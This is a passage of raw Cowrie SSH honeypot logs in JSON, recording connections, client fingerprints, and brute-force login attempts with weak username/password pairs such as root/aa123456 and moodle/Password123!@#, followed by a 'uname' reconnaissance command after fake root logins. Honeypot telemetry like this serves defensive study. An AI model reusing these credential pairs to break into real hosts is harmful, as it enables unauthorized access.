.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:34.871056Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:55:35.437416Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:55:35.828397Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:55:35.829121Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:36.018481Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:36.019766Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:36.215665Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:36.216517Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:36.409661Z","src_ip":"212.227.235.229","session":"582b25949067"}
{"eventid":"cowrie.login.failed","username":"install","password":"install","message":"login attempt [install/install] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:37.539321Z","src_ip":"212.227.235.229","session":"0a024f90290b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36224,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35aa32eb11c","protocol":"ssh","message":"New connection: 212.227.235.229:36224 (1.2.3.4:22) [session: d35aa32eb11c]","sensor":"my-vps","timestamp":"2025-08-31T04:55:38.614795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:38.688877Z","src_ip":"212.227.235.229","session":"d35aa32eb11c"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:39.174179Z","src_ip":"212.227.235.229","session":"0a024f90290b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36614,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa195f683c6f","protocol":"ssh","message":"New connection: 212.227.125.160:36614 (1.2.3.4:22) [session: aa195f683c6f]","sensor":"my-vps","timestamp":"2025-08-31T04:55:40.070230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:40.071132Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:40.253594Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:55:40.803344Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:55:41.183805Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.184458Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.241919Z","src_ip":"212.227.235.229","session":"d35aa32eb11c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34844,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5f73defc639","protocol":"ssh","message":"New connection: 212.227.235.229:34844 (1.2.3.4:22) [session: a5f73defc639]","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.276243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.289661Z","src_ip":"212.227.235.229","session":"a5f73defc639"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.367876Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.368943Z","src_ip":"212.227.125.160","session":"aa195f683c6f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:41.737074Z","src_ip":"212.227.235.229","session":"a5f73defc639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60046,"dst_ip":"1.2.3.4","dst_port":22,"session":"93c8ec9cb5b0","protocol":"ssh","message":"New connection: 212.227.235.229:60046 (1.2.3.4:22) [session: 93c8ec9cb5b0]","sensor":"my-vps","timestamp":"2025-08-31T04:55:42.010690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:42.757683Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:55:42.758482Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34852,"dst_ip":"1.2.3.4","dst_port":22,"session":"62ab2b16edd1","protocol":"ssh","message":"New connection: 212.227.235.229:34852 (1.2.3.4:22) [session: 62ab2b16edd1]","sensor":"my-vps","timestamp":"2025-08-31T04:55:42.989001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:42.990609Z","src_ip":"212.227.235.229","session":"62ab2b16edd1"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:43.115300Z","src_ip":"212.227.235.229","session":"a5f73defc639"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:43.521346Z","src_ip":"212.227.235.229","session":"62ab2b16edd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49406,"dst_ip":"1.2.3.4","dst_port":22,"session":"332a3a3d0f44","protocol":"ssh","message":"New connection: 212.227.235.229:49406 (1.2.3.4:22) [session: 332a3a3d0f44]","sensor":"my-vps","timestamp":"2025-08-31T04:55:44.124369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:55:44.124938Z","src_ip":"212.227.235.229","session":"332a3a3d0f44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:55:44.247312Z","src_ip":"212.227.235.229","session":"332a3a3d0f44"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"Password123!@#","message":"login attempt [moodle/Password123!@#] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:44.773984Z","src_ip":"212.227.235.229","session":"332a3a3d0f44"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:45.098100Z","src_ip":"212.227.235.229","session":"a5f73defc639"}
{"eventid":"cowrie.login.failed","username":"madrid","password":"madrid","message":"login attempt [madrid/madrid] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:45.180464Z","src_ip":"212.227.235.229","session":"62ab2b16edd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34862,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8a99a771f65","protocol":"ssh","message":"New connection: 212.227.235.229:34862 (1.2.3.4:22) [session: a8a99a771f65]","sensor":"my-vps","timestamp":"2025-08-31T04:55:45.405320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:45.406394Z","src_ip":"212.227.235.229","session":"a8a99a771f65"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp